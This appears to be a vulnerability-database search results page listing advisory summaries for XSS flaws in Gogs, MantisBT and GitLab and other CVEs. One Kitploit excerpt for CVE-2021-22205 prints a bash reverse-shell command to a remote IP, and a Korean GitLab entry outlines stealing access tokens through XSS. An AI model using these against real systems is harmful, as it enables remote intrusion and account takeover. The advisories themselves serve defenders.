Lucene search
+L

48 matches found

Kitploit
Kitploit
added 2026/08/27 12:13 a.m.3 views

CVE-2022-1175

CVE-2022-1175 Gitlab 저장형 XSS로, 프로젝트의 이슈에 설정할 수 있으며 자신의 프로젝트든 다른 사용자의 프로젝트든 가능합니다. 이슈를 방문하는 모든 사람의 Personal Access TokenPAT을 생성 및 탈취하는 등의 공격을 허용합니다. 탈취한 PAT는 해당 사용자와 동일한 전체 Gitlab API 접근 권한을 제공하므로 사실상 완전한 계정 탈취와 동일합니다. 프로젝트의 베이스를 자신의 사이트로 변경하여 스크립트가 자신의 사이트에서 로드되도록 함으로써 악용할 수 있습니다. 페이지에서 호출되는 스크립트...

8.7CVSS7.3AI score0.82003EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/08/26 11:01 p.m.5 views

CVE-2021-22205-getshell

CVE-2021-22205-getshell CVE-2021-22205-getshell Тестовая версия Создание команды для эксплуатации уязвимости root@kitploit: echo 'bash -i & /dev/tcp/192.168.147.5/4444 0&1' /tmp/1.sh chmod +x /tmp/1.sh /bin/bash /tmp/1.sh Создание изображения для эксплуатации с помощью djvumake root@kitploit:...

10CVSS8.8AI score0.99731EPSS
SaveExploits29
SUSE CVE
SUSE CVE
added 2026/07/30 4:42 p.m.9 views

SUSE CVE-2026-52807

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS7.7AI score0.00483EPSS
SaveExploits0References2
OSV
OSV
added 2026/06/25 10:34 p.m.14 views

GO-2026-5661 Gogs has DOM-based XSS via Milestone Name on New Issue Page in gogs.io/gogs

Gogs has DOM-based XSS via Milestone Name on New Issue Page in gogs.io/gogs. NOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions. If this is causing false-positive reports from vulnerability scanners, please...

4.8CVSS5.8AI score0.00483EPSS
SaveExploits0References4
NVD
NVD
added 2026/06/24 9:16 p.m.17 views

CVE-2026-52807

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS0.00483EPSS
SaveExploits0References4
CVE
CVE
added 2026/06/24 8:25 p.m.37 views

CVE-2026-52807

Summary (supported by provided docs): Gogs is affected by a DOM-based XSS in the New Issue page when a milestone name contains HTML/JS payloads. The root cause involves client-side rendering: milestone names are rendered with Go’s escaping in new_form.tmpl, but Semantic UI 2.4.2 uses preserveHTML...

4.8CVSS5.9AI score0.00483EPSS
SaveExploits0References4
Cvelist
Cvelist
added 2026/06/24 8:25 p.m.39 views

CVE-2026-52807 Gogs: DOM-based XSS via Milestone Name on New Issue Page

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS0.00483EPSS
SaveExploits0References4
Vulnrichment
Vulnrichment
added 2026/06/24 8:25 p.m.11 views

CVE-2026-52807 Gogs: DOM-based XSS via Milestone Name on New Issue Page

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS5.9AI score0.00483EPSS
SaveExploits0References4
OSV
OSV
added 2026/06/24 8:25 p.m.13 views

CVE-2026-52807 Gogs: DOM-based XSS via Milestone Name on New Issue Page

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS6AI score
SaveExploits0References6
EUVD
EUVD
added 2026/06/24 8:25 p.m.25 views

EUVD-2026-39075

Gogs is an open source self-hosted Git service. Prior to 0.14.3, in newform.tmpl, milestone names are rendered with Go's default auto-escaping .Name, which converts to etc. This prevents direct HTML injection. However, when the browser renders the DOM, the text content of the element contains the...

4.8CVSS5.9AI score0.00483EPSS
SaveExploits0References4
OSV
OSV
added 2026/06/23 5:02 p.m.15 views

GHSA-VCM5-GVMP-78MP Gogs has DOM-based XSS via Milestone Name on New Issue Page

Summary The fix for GHSA-vgjm-2cpf-4g7c DOM-based XSS via milestone selection was only applied to templates/repo/issue/viewcontent.tmpl but not to templates/repo/issue/newform.tmpl. An attacker can store an HTML/JavaScript payload in a milestone name, and when any user opens the New Issue page an...

4.8CVSS6AI score0.00483EPSS
SaveExploits0References6
Github Security Blog
Github Security Blog
added 2026/06/23 5:02 p.m.22 views

Gogs has DOM-based XSS via Milestone Name on New Issue Page

Summary The fix for GHSA-vgjm-2cpf-4g7c DOM-based XSS via milestone selection was only applied to templates/repo/issue/viewcontent.tmpl but not to templates/repo/issue/newform.tmpl. An attacker can store an HTML/JavaScript payload in a milestone name, and when any user opens the New Issue page an...

4.8CVSS6AI score0.00483EPSS
SaveExploits0References6Affected Software1
Positive Technologies
Positive Technologies
added 2026/06/23 12:00 a.m.40 views

PT-2026-51625

Name of the Vulnerable Software and Affected Versions Gogs affected versions not specified Gitea affected versions not specified Description A stored DOM-based Cross-Site Scripting XSS issue exists where an attacker can store an HTML or JavaScript payload in a milestone name. When a user opens th...

4.8CVSS6AI score0.00483EPSS
SaveExploits0
RedhatCVE
RedhatCVE
added 2026/06/05 7:26 p.m.14 views

CVE-2026-39960

Mantis Bug Tracker MantisBT is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, bugupdatepage.php allowing an attacker to inject HTML and, if CSP settings permit, execute...

5.4CVSS5.7AI score0.0023EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/05/28 2:15 p.m.21 views

CVE-2026-47715

Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, Bugsink issue event pages accept a direct event identifier from the URL and, in affected versions, look up that event without also requiring it to belong to the issue in the URL. This is a project-boundary authorization issue: a...

3.1CVSS5.8AI score0.00154EPSS
SaveExploits0References1
NVD
NVD
added 2026/05/20 10:16 p.m.22 views

CVE-2026-39960

Mantis Bug Tracker MantisBT is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, bugupdatepage.php allowing an attacker to inject HTML and, if CSP settings permit, execute...

5.4CVSS0.0023EPSS
SaveExploits0References2
ATTACKERKB
ATTACKERKB
added 2026/05/20 9:11 p.m.12 views

CVE-2026-39960

Mantis Bug Tracker MantisBT is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, bugupdatepage.php allowing an attacker to inject HTML and, if CSP settings permit, execute...

5.4CVSS6AI score0.0023EPSS
SaveExploits0References3Affected Software1
EUVD
EUVD
added 2026/05/20 9:11 p.m.23 views

EUVD-2026-31192

Mantis Bug Tracker MantisBT is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, bugupdatepage.php allowing an attacker to inject HTML and, if CSP settings permit, execute...

5.4CVSS6AI score0.0023EPSS
SaveExploits0References2
CVE
CVE
added 2026/05/20 9:11 p.m.68 views

CVE-2026-39960

MantisBT (versions ≤ 2.28.1) is vulnerable to Stored XSS via improper escaping of a textarea custom field on the Update Issue page (bug_update_page.php). The flaw allows an attacker, authenticated with bug report permission, to inject HTML and potentially execute JavaScript when the page loads, e...

5.4CVSS6AI score0.0023EPSS
SaveExploits0References2
OSV
OSV
added 2026/05/20 9:11 p.m.20 views

CVE-2026-39960 MantisBT is Vulnerable to Stored XSS through Custom Field Textarea Values

Mantis Bug Tracker MantisBT is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, bugupdatepage.php allowing an attacker to inject HTML and, if CSP settings permit, execute...

5.4CVSS6.1AI score
SaveExploits0References4
Rows per page
Query Builder